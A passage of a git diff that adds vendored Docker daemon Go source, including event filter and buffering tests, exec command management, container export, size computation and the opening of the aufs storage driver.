timetypes.ParseTimestamps(f, -1) + if err != nil { + t.Fatal(err) + } + + m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)") + if err != nil { + t.Fatal(err) + } + m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + + events := &Events{ + events: []events.Message{*m1, *m2, *m3}, + } + + since := time.Unix(s, sNano) + until := time.Time{} + + out := events.loadBufferedEvents(since, until, nil) + if len(out) != 1 { + t.Fatalf("expected 1 message, got %d: %v", len(out), out) + } +} + +func TestLoadBufferedEventsOnlyFromPast(t *testing.T) { + now := time.Now() + f, err := timetypes.GetTimestamp("2016-03-07T17:28:03.090000000+02:00", now) + if err != nil { + t.Fatal(err) + } + s, sNano, err := timetypes.ParseTimestamps(f, 0) + if err != nil { + t.Fatal(err) + } + + f, err = timetypes.GetTimestamp("2016-03-07T17:28:03.100000000+02:00", now) + if err != nil { + t.Fatal(err) + } + u, uNano, err := timetypes.ParseTimestamps(f, 0) + if err != nil { + t.Fatal(err) + } + + m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)") + if err != nil { + t.Fatal(err) + } + m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + + events := &Events{ + events: []events.Message{*m1, *m2, *m3}, + } + + since := time.Unix(s, sNano) + until := time.Unix(u, uNano) + + out := events.loadBufferedEvents(since, until, nil) + if len(out) != 1 { + t.Fatalf("expected 1 message, got %d: %v", len(out), out) + } + + if out[0].Type != "network" { + t.Fatalf("expected network event, got %s", out[0].Type) + } +} + +// #13753 +func TestIngoreBufferedWhenNoTimes(t *testing.T) { + m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + m2, err := eventstestutils.Scan("2016-03-07T17:28:03.091719377+02:00 network disconnect 19c5ed41acb798f26b751e0035cd7821741ab79e2bbd59a66b5fd8abf954eaa0 (type=bridge, container=0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079, name=bridge)") + if err != nil { + t.Fatal(err) + } + m3, err := eventstestutils.Scan("2016-03-07T17:28:03.129014751+02:00 container destroy 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") + if err != nil { + t.Fatal(err) + } + + events := &Events{ + events: []events.Message{*m1, *m2, *m3}, + } + + since := time.Time{} + until := time.Time{} + + out := events.loadBufferedEvents(since, until, nil) + if len(out) != 0 { + t.Fatalf("expected 0 buffered events, got %q", out) + } +} diff --git a/vendor/github.com/docker/docker/daemon/events/filter.go b/vendor/github.com/docker/docker/daemon/events/filter.go new file mode 100644 index 0000000000..5c9c527692 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/filter.go @@ -0,0 +1,110 @@ +package events + +import ( + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/reference" +) + +// Filter can filter out docker events from a stream +type Filter struct { + filter filters.Args +} + +// NewFilter creates a new Filter +func NewFilter(filter filters.Args) *Filter { + return &Filter{filter: filter} +} + +// Include returns true when the event ev is included by the filters +func (ef *Filter) Include(ev events.Message) bool { + return ef.matchEvent(ev) && + ef.filter.ExactMatch("type", ev.Type) && + ef.matchDaemon(ev) && + ef.matchContainer(ev) && + ef.matchPlugin(ev) && + ef.matchVolume(ev) && + ef.matchNetwork(ev) && + ef.matchImage(ev) && + ef.matchLabels(ev.Actor.Attributes) +} + +func (ef *Filter) matchEvent(ev events.Message) bool { + // #25798 if an event filter contains either health_status, exec_create or exec_start without a colon + // Let's to a FuzzyMatch instead of an ExactMatch. + if ef.filterContains("event", map[string]struct{}{"health_status": {}, "exec_create": {}, "exec_start": {}}) { + return ef.filter.FuzzyMatch("event", ev.Action) + } + return ef.filter.ExactMatch("event", ev.Action) +} + +func (ef *Filter) filterContains(field string, values map[string]struct{}) bool { + for _, v := range ef.filter.Get(field) { + if _, ok := values[v]; ok { + return true + } + } + return false +} + +func (ef *Filter) matchLabels(attributes map[string]string) bool { + if !ef.filter.Include("label") { + return true + } + return ef.filter.MatchKVList("label", attributes) +} + +func (ef *Filter) matchDaemon(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.DaemonEventType) +} + +func (ef *Filter) matchContainer(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.ContainerEventType) +} + +func (ef *Filter) matchPlugin(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.PluginEventType) +} + +func (ef *Filter) matchVolume(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.VolumeEventType) +} + +func (ef *Filter) matchNetwork(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.NetworkEventType) +} + +func (ef *Filter) fuzzyMatchName(ev events.Message, eventType string) bool { + return ef.filter.FuzzyMatch(eventType, ev.Actor.ID) || + ef.filter.FuzzyMatch(eventType, ev.Actor.Attributes["name"]) +} + +// matchImage matches against both event.Actor.ID (for image events) +// and event.Actor.Attributes["image"] (for container events), so that any container that was created +// from an image will be included in the image events. Also compare both +// against the stripped repo name without any tags. +func (ef *Filter) matchImage(ev events.Message) bool { + id := ev.Actor.ID + nameAttr := "image" + var imageName string + + if ev.Type == events.ImageEventType { + nameAttr = "name" + } + + if n, ok := ev.Actor.Attributes[nameAttr]; ok { + imageName = n + } + return ef.filter.ExactMatch("image", id) || + ef.filter.ExactMatch("image", imageName) || + ef.filter.ExactMatch("image", stripTag(id)) || + ef.filter.ExactMatch("image", stripTag(imageName)) +} + +func stripTag(image string) string { + ref, err := reference.ParseNamed(image) + if err != nil { + return image + } + return ref.Name() +} diff --git a/vendor/github.com/docker/docker/daemon/events/metrics.go b/vendor/github.com/docker/docker/daemon/events/metrics.go new file mode 100644 index 0000000000..c9a89ec0ed --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/metrics.go @@ -0,0 +1,15 @@ +package events + +import "github.com/docker/go-metrics" + +var ( + eventsCounter metrics.Counter + eventSubscribers metrics.Gauge +) + +func init() { + ns := metrics.NewNamespace("engine", "daemon", nil) + eventsCounter = ns.NewCounter("events", "The number of events logged") + eventSubscribers = ns.NewGauge("events_subscribers", "The number of current subscribers to events", metrics.Total) + metrics.Register(ns) +} diff --git a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go new file mode 100644 index 0000000000..3544446e18 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go @@ -0,0 +1,76 @@ +package testutils + +import ( + "fmt" + "regexp" + "strings" + "time" + + "github.com/docker/docker/api/types/events" + timetypes "github.com/docker/docker/api/types/time" +) + +var ( + reTimestamp = `(?P\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}.\d{9}(:?(:?(:?-|\+)\d{2}:\d{2})|Z))` + reEventType = `(?P\w+)` + reAction = `(?P\w+)` + reID = `(?P[^\s]+)` + reAttributes = `(\s\((?P[^\)]+)\))?` + reString = fmt.Sprintf(`\A%s\s%s\s%s\s%s%s\z`, reTimestamp, reEventType, reAction, reID, reAttributes) + + // eventCliRegexp is a regular expression that matches all possible event outputs in the cli + eventCliRegexp = regexp.MustCompile(reString) +) + +// ScanMap turns an event string like the default ones formatted in the cli output +// and turns it into map. +func ScanMap(text string) map[string]string { + matches := eventCliRegexp.FindAllStringSubmatch(text, -1) + md := map[string]string{} + if len(matches) == 0 { + return md + } + + names := eventCliRegexp.SubexpNames() + for i, n := range matches[0] { + md[names[i]] = n + } + return md +} + +// Scan turns an event string like the default ones formatted in the cli output +// and turns it into an event message. +func Scan(text string) (*events.Message, error) { + md := ScanMap(text) + if len(md) == 0 { + return nil, fmt.Errorf("text is not an event: %s", text) + } + + f, err := timetypes.GetTimestamp(md["timestamp"], time.Now()) + if err != nil { + return nil, err + } + + t, tn, err := timetypes.ParseTimestamps(f, -1) + if err != nil { + return nil, err + } + + attrs := make(map[string]string) + for _, a := range strings.SplitN(md["attributes"], ", ", -1) { + kv := strings.SplitN(a, "=", 2) + attrs[kv[0]] = kv[1] + } + + tu := time.Unix(t, tn) + return &events.Message{ + Time: t, + TimeNano: tu.UnixNano(), + Type: md["eventType"], + Action: md["action"], + Actor: events.Actor{ + ID: md["id"], + Attributes: attrs, + }, + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/events_test.go b/vendor/github.com/docker/docker/daemon/events_test.go new file mode 100644 index 0000000000..2dbcc27dfc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events_test.go @@ -0,0 +1,94 @@ +package daemon + +import ( + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/events" +) + +func TestLogContainerEventCopyLabels(t *testing.T) { + e := events.New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + container := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + Labels: map[string]string{ + "node": "1", + "os": "alpine", + }, + }, + }, + } + daemon := &Daemon{ + EventsService: e, + } + daemon.LogContainerEvent(container, "create") + + if _, mutated := container.Config.Labels["image"]; mutated { + t.Fatalf("Expected to not mutate the container labels, got %q", container.Config.Labels) + } + + validateTestAttributes(t, l, map[string]string{ + "node": "1", + "os": "alpine", + }) +} + +func TestLogContainerEventWithAttributes(t *testing.T) { + e := events.New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + container := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Labels: map[string]string{ + "node": "1", + "os": "alpine", + }, + }, + }, + } + daemon := &Daemon{ + EventsService: e, + } + attributes := map[string]string{ + "node": "2", + "foo": "bar", + } + daemon.LogContainerEventWithAttributes(container, "create", attributes) + + validateTestAttributes(t, l, map[string]string{ + "node": "1", + "foo": "bar", + }) +} + +func validateTestAttributes(t *testing.T, l chan interface{}, expectedAttributesToTest map[string]string) { + select { + case ev := <-l: + event, ok := ev.(eventtypes.Message) + if !ok { + t.Fatalf("Unexpected event message: %q", ev) + } + for key, expected := range expectedAttributesToTest { + actual, ok := event.Actor.Attributes[key] + if !ok || actual != expected { + t.Fatalf("Expected value for key %s to be %s, but was %s (event:%v)", key, expected, actual, event) + } + } + case <-time.After(10 * time.Second): + t.Fatalf("LogEvent test timed out") + } +} diff --git a/vendor/github.com/docker/docker/daemon/exec.go b/vendor/github.com/docker/docker/daemon/exec.go new file mode 100644 index 0000000000..8197426a33 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec.go @@ -0,0 +1,280 @@ +package daemon + +import ( + "fmt" + "io" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/term" + "github.com/docker/docker/utils" +) + +// Seconds to wait after sending TERM before trying KILL +const termProcessTimeout = 10 + +func (d *Daemon) registerExecCommand(container *container.Container, config *exec.Config) { + // Storing execs in container in order to kill them gracefully whenever the container is stopped or removed. + container.ExecCommands.Add(config.ID, config) + // Storing execs in daemon for easy access via Engine API. + d.execCommands.Add(config.ID, config) +} + +// ExecExists looks up the exec instance and returns a bool if it exists or not. +// It will also return the error produced by `getConfig` +func (d *Daemon) ExecExists(name string) (bool, error) { + if _, err := d.getExecConfig(name); err != nil { + return false, err + } + return true, nil +} + +// getExecConfig looks up the exec instance by name. If the container associated +// with the exec instance is stopped or paused, it will return an error. +func (d *Daemon) getExecConfig(name string) (*exec.Config, error) { + ec := d.execCommands.Get(name) + + // If the exec is found but its container is not in the daemon's list of + // containers then it must have been deleted, in which case instead of + // saying the container isn't running, we should return a 404 so that + // the user sees the same error now that they will after the + // 5 minute clean-up loop is run which erases old/dead execs. + + if ec != nil { + if container := d.containers.Get(ec.ContainerID); container != nil { + if !container.IsRunning() { + return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String()) + } + if container.IsPaused() { + return nil, errExecPaused(container.ID) + } + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return ec, nil + } + } + + return nil, errExecNotFound(name) +} + +func (d *Daemon) unregisterExecCommand(container *container.Container, execConfig *exec.Config) { + container.ExecCommands.Delete(execConfig.ID) + d.execCommands.Delete(execConfig.ID) +} + +func (d *Daemon) getActiveContainer(name string) (*container.Container, error) { + container, err := d.GetContainer(name) + if err != nil { + return nil, err + } + + if !container.IsRunning() { + return nil, errNotRunning{container.ID} + } + if container.IsPaused() { + return nil, errExecPaused(name) + } + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return container, nil +} + +// ContainerExecCreate sets up an exec in a running container. +func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (string, error) { + container, err := d.getActiveContainer(name) + if err != nil { + return "", err + } + + cmd := strslice.StrSlice(config.Cmd) + entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmd) + + keys := []byte{} + if config.DetachKeys != "" { + keys, err = term.ToBytes(config.DetachKeys) + if err != nil { + err = fmt.Errorf("Invalid escape keys (%s) provided", config.DetachKeys) + return "", err + } + } + + execConfig := exec.NewConfig() + execConfig.OpenStdin = config.AttachStdin + execConfig.OpenStdout = config.AttachStdout + execConfig.OpenStderr = config.AttachStderr + execConfig.ContainerID = container.ID + execConfig.DetachKeys = keys + execConfig.Entrypoint = entrypoint + execConfig.Args = args + execConfig.Tty = config.Tty + execConfig.Privileged = config.Privileged + execConfig.User = config.User + + linkedEnv, err := d.setupLinkedContainers(container) + if err != nil { + return "", err + } + execConfig.Env = utils.ReplaceOrAppendEnvValues(container.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env) + if len(execConfig.User) == 0 { + execConfig.User = container.Config.User + } + + d.registerExecCommand(container, execConfig) + + d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " ")) + + return execConfig.ID, nil +} + +// ContainerExecStart starts a previously set up exec instance. The +// std streams are set up. +// If ctx is cancelled, the process is terminated. +func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) (err error) { + var ( + cStdin io.ReadCloser + cStdout, cStderr io.Writer + ) + + ec, err := d.getExecConfig(name) + if err != nil { + return errExecNotFound(name) + } + + ec.Lock() + if ec.ExitCode != nil { + ec.Unlock() + err := fmt.Errorf("Error: Exec command %s has already run", ec.ID) + return errors.NewRequestConflictError(err) + } + + if ec.Running { + ec.Unlock() + return fmt.Errorf("Error: Exec command %s is already running", ec.ID) + } + ec.Running = true + defer func() { + if err != nil { + ec.Running = false + exitCode := 126 + ec.ExitCode = &exitCode + } + }() + ec.Unlock() + + c := d.containers.Get(ec.ContainerID) + logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID) + d.LogContainerEvent(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " ")) + + if ec.OpenStdin && stdin != nil { + r, w := io.Pipe() + go func() { + defer w.Close() + defer logrus.Debug("Closing buffered stdin pipe") + pools.Copy(w, stdin) + }() + cStdin = r + } + if ec.OpenStdout { + cStdout = stdout + } + if ec.OpenStderr { + cStderr = stderr + } + + if ec.OpenStdin { + ec.StreamConfig.NewInputPipes() + } else { + ec.StreamConfig.NewNopInputPipe() + } + + p := libcontainerd.Process{ + Args: append([]string{ec.Entrypoint}, ec.Args...), + Env: ec.Env, + Terminal: ec.Tty, + } + + if err := execSetPlatformOpt(c, ec, &p); err != nil { + return err + } + + attachErr := container.AttachStreams(ctx, ec.StreamConfig, ec.OpenStdin, true, ec.Tty, cStdin, cStdout, cStderr, ec.DetachKeys) + + systemPid, err := d.containerd.AddProcess(ctx, c.ID, name, p, ec.InitializeStdio) + if err != nil { + return err + } + ec.Lock() + ec.Pid = systemPid + ec.Unlock() + + select { + case <-ctx.Done(): + logrus.Debugf("Sending TERM signal to process %v in container %v", name, c.ID) + d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["TERM"])) + select { + case <-time.After(termProcessTimeout * time.Second): + logrus.Infof("Container %v, process %v failed to exit within %d seconds of signal TERM - using the force", c.ID, name, termProcessTimeout) + d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["KILL"])) + case <-attachErr: + // TERM signal worked + } + return fmt.Errorf("context cancelled") + case err := <-attachErr: + if err != nil { + if _, ok := err.(container.DetachError); !ok { + return fmt.Errorf("exec attach failed with error: %v", err) + } + d.LogContainerEvent(c, "exec_detach") + } + } + return nil +} + +// execCommandGC runs a ticker to clean up the daemon references +// of exec configs that are no longer part of the container. +func (d *Daemon) execCommandGC() { + for range time.Tick(5 * time.Minute) { + var ( + cleaned int + liveExecCommands = d.containerExecIds() + ) + for id, config := range d.execCommands.Commands() { + if config.CanRemove { + cleaned++ + d.execCommands.Delete(id) + } else { + if _, exists := liveExecCommands[id]; !exists { + config.CanRemove = true + } + } + } + if cleaned > 0 { + logrus.Debugf("clean %d unused exec commands", cleaned) + } + } +} + +// containerExecIds returns a list of all the current exec ids that are in use +// and running inside a container. +func (d *Daemon) containerExecIds() map[string]struct{} { + ids := map[string]struct{}{} + for _, c := range d.containers.List() { + for _, id := range c.ExecCommands.List() { + ids[id] = struct{}{} + } + } + return ids +} diff --git a/vendor/github.com/docker/docker/daemon/exec/exec.go b/vendor/github.com/docker/docker/daemon/exec/exec.go new file mode 100644 index 0000000000..933136f965 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec/exec.go @@ -0,0 +1,118 @@ +package exec + +import ( + "runtime" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container/stream" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/stringid" +) + +// Config holds the configurations for execs. The Daemon keeps +// track of both running and finished execs so that they can be +// examined both during and after completion. +type Config struct { + sync.Mutex + StreamConfig *stream.Config + ID string + Running bool + ExitCode *int + OpenStdin bool + OpenStderr bool + OpenStdout bool + CanRemove bool + ContainerID string + DetachKeys []byte + Entrypoint string + Args []string + Tty bool + Privileged bool + User string + Env []string + Pid int +} + +// NewConfig initializes the a new exec configuration +func NewConfig() *Config { + return &Config{ + ID: stringid.GenerateNonCryptoID(), + StreamConfig: stream.NewConfig(), + } +} + +// InitializeStdio is called by libcontainerd to connect the stdio. +func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error { + c.StreamConfig.CopyToPipe(iop) + + if c.StreamConfig.Stdin() == nil && !c.Tty && runtime.GOOS == "windows" { + if iop.Stdin != nil { + if err := iop.Stdin.Close(); err != nil { + logrus.Errorf("error closing exec stdin: %+v", err) + } + } + } + + return nil +} + +// CloseStreams closes the stdio streams for the exec +func (c *Config) CloseStreams() error { + return c.StreamConfig.CloseStreams() +} + +// Store keeps track of the exec configurations. +type Store struct { + commands map[string]*Config + sync.RWMutex +} + +// NewStore initializes a new exec store. +func NewStore() *Store { + return &Store{commands: make(map[string]*Config, 0)} +} + +// Commands returns the exec configurations in the store. +func (e *Store) Commands() map[string]*Config { + e.RLock() + commands := make(map[string]*Config, len(e.commands)) + for id, config := range e.commands { + commands[id] = config + } + e.RUnlock() + return commands +} + +// Add adds a new exec configuration to the store. +func (e *Store) Add(id string, Config *Config) { + e.Lock() + e.commands[id] = Config + e.Unlock() +} + +// Get returns an exec configuration by its id. +func (e *Store) Get(id string) *Config { + e.RLock() + res := e.commands[id] + e.RUnlock() + return res +} + +// Delete removes an exec configuration from the store. +func (e *Store) Delete(id string) { + e.Lock() + delete(e.commands, id) + e.Unlock() +} + +// List returns the list of exec ids in the store. +func (e *Store) List() []string { + var IDs []string + e.RLock() + for id := range e.commands { + IDs = append(IDs, id) + } + e.RUnlock() + return IDs +} diff --git a/vendor/github.com/docker/docker/daemon/exec_linux.go b/vendor/github.com/docker/docker/daemon/exec_linux.go new file mode 100644 index 0000000000..5aeedc3470 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec_linux.go @@ -0,0 +1,27 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/caps" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { + if len(ec.User) > 0 { + uid, gid, additionalGids, err := getUser(c, ec.User) + if err != nil { + return err + } + p.User = &specs.User{ + UID: uid, + GID: gid, + AdditionalGids: additionalGids, + } + } + if ec.Privileged { + p.Capabilities = caps.GetAllCapabilities() + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/exec_solaris.go b/vendor/github.com/docker/docker/daemon/exec_solaris.go new file mode 100644 index 0000000000..7003355d91 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec_solaris.go @@ -0,0 +1,11 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/libcontainerd" +) + +func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/exec_windows.go b/vendor/github.com/docker/docker/daemon/exec_windows.go new file mode 100644 index 0000000000..1d6974cda9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec_windows.go @@ -0,0 +1,14 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/libcontainerd" +) + +func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { + // Process arguments need to be escaped before sending to OCI. + p.Args = escapeArgs(p.Args) + p.User.Username = ec.User + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/export.go b/vendor/github.com/docker/docker/daemon/export.go new file mode 100644 index 0000000000..5ef6dbb0e5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/export.go @@ -0,0 +1,60 @@ +package daemon + +import ( + "fmt" + "io" + "runtime" + + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/ioutils" +) + +// ContainerExport writes the contents of the container to the given +// writer. An error is returned if the container cannot be found. +func (daemon *Daemon) ContainerExport(name string, out io.Writer) error { + if runtime.GOOS == "windows" { + return fmt.Errorf("the daemon on this platform does not support export of a container") + } + + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + data, err := daemon.containerExport(container) + if err != nil { + return fmt.Errorf("Error exporting container %s: %v", name, err) + } + defer data.Close() + + // Stream the entire contents of the container (basically a volatile snapshot) + if _, err := io.Copy(out, data); err != nil { + return fmt.Errorf("Error exporting container %s: %v", name, err) + } + return nil +} + +func (daemon *Daemon) containerExport(container *container.Container) (io.ReadCloser, error) { + if err := daemon.Mount(container); err != nil { + return nil, err + } + + uidMaps, gidMaps := daemon.GetUIDGIDMaps() + archive, err := archive.TarWithOptions(container.BaseFS, &archive.TarOptions{ + Compression: archive.Uncompressed, + UIDMaps: uidMaps, + GIDMaps: gidMaps, + }) + if err != nil { + daemon.Unmount(container) + return nil, err + } + arch := ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + daemon.Unmount(container) + return err + }) + daemon.LogContainerEvent(container, "export") + return arch, err +} diff --git a/vendor/github.com/docker/docker/daemon/getsize_unix.go b/vendor/github.com/docker/docker/daemon/getsize_unix.go new file mode 100644 index 0000000000..707323a4bf --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/getsize_unix.go @@ -0,0 +1,41 @@ +// +build linux freebsd solaris + +package daemon + +import ( + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" +) + +// getSize returns the real size & virtual size of the container. +func (daemon *Daemon) getSize(container *container.Container) (int64, int64) { + var ( + sizeRw, sizeRootfs int64 + err error + ) + + if err := daemon.Mount(container); err != nil { + logrus.Errorf("Failed to compute size of container rootfs %s: %s", container.ID, err) + return sizeRw, sizeRootfs + } + defer daemon.Unmount(container) + + sizeRw, err = container.RWLayer.Size() + if err != nil { + logrus.Errorf("Driver %s couldn't return diff size of container %s: %s", + daemon.GraphDriverName(), container.ID, err) + // FIXME: GetSize should return an error. Not changing it now in case + // there is a side-effect. + sizeRw = -1 + } + + if parent := container.RWLayer.Parent(); parent != nil { + sizeRootfs, err = parent.Size() + if err != nil { + sizeRootfs = -1 + } else if sizeRw != -1 { + sizeRootfs += sizeRw + } + } + return sizeRw, sizeRootfs +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go new file mode 100644 index 0000000000..ec55ea4cde --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go @@ -0,0 +1,669 @@ +// +build linux + +/* + +aufs driver directory structure + + . + ├── layers // Metadata of layers + │ ├── 1 + │ ├── 2 + │ └── 3 + ├── diff // Content of the layer + │ ├── 1 // Contains layers that need to be mounted for the id + │ ├── 2 + │ └── 3 + └── mnt // Mount points for the rw layers to be mounted + ├── 1 + ├── 2 + └── 3 + +*/ + +package aufs + +import ( + "bufio" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/vbatts/tar-split/tar/storage" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/pkg/idtools" + mountpk "github.com/docker/docker/pkg/mount" + + "github.com/opencontainers/runc/libcontainer/label" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +var ( + // ErrAufsNotSupported is returned if aufs is not supported by the host. + ErrAufsNotSupported = fmt.Errorf("AUFS was not found in /proc/filesystems") + // ErrAufsNested means aufs cannot be used bc we are in a user namespace + ErrAufsNested = fmt.Errorf("AUFS cannot be used in non-init user namespace") + backingFs = "" + + enableDirpermLock sync.Once + enableDirperm bool +) + +func init() { + graphdriver.Register("aufs", Init) +} + +// Driver contains information about the filesystem mounted. +type Driver struct { + sync.Mutex + root string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter + pathCacheLock sync.Mutex + pathCache map[string]string + naiveDiff graphdriver.DiffDriver +} + +// Init returns a new AUFS driver. +// An error is returned if AUFS is not supported. +func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + + // Try to load the aufs kernel module + if err := supportsAufs(); err != nil { + return nil, graphdriver.ErrNotSupported + } + + fsMagic, err := graphdriver.GetFSMagic(root) + if err != nil { + return nil, err + } + if fsName, ok := graphdriver.FsNames[fsMagic]; ok { + backingFs = fsName + } + + switch fsMagic { + case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs: + logrus.Errorf("AUFS is not supported over %s", backingFs) + return nil, graphdriver.ErrIncompatibleFS + } + + paths := []string{ + "mnt", + "diff", + "layers", + } + + a := &Driver{ + root: root, + uidMaps: uidMaps, + gidMaps: gidMaps, + pathCache: make(map[string]string), + ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicAufs)), + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + // Create the root aufs driver dir and return + // if it already exists + // If not populate the dir structure + if err := idtools.MkdirAllAs(root, 0700, rootUID, rootGID); err != nil { + if os.IsExist(err) { + return a, nil + } + return nil, err + } + + if err := mountpk.MakePrivate(root); err != nil { + return nil, err + } + + // Populate the dir structure + for _, p := range paths { + if err := idtools.MkdirAllAs(path.Join(root, p), 0700, rootUID, rootGID); err != nil { + return nil, err + } + } + + a.naiveDiff = graphdriver.NewNaiveDiffDriver(a, uidMaps, gidMaps) + return a, nil +} + +// Return a nil error if the kernel supports aufs +// We cannot modprobe because inside dind modprobe fails +// to run +func supportsAufs() error { + // We can try to modprobe aufs first before looking at + // proc/filesystems for when aufs is supported + exec.Command("modprobe", "aufs").Run() + + if rsystem.RunningInUserNS() { + return ErrAufsNested + } + + f, err := os.Open("/proc/filesystems") + if err != nil { + return err + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + if 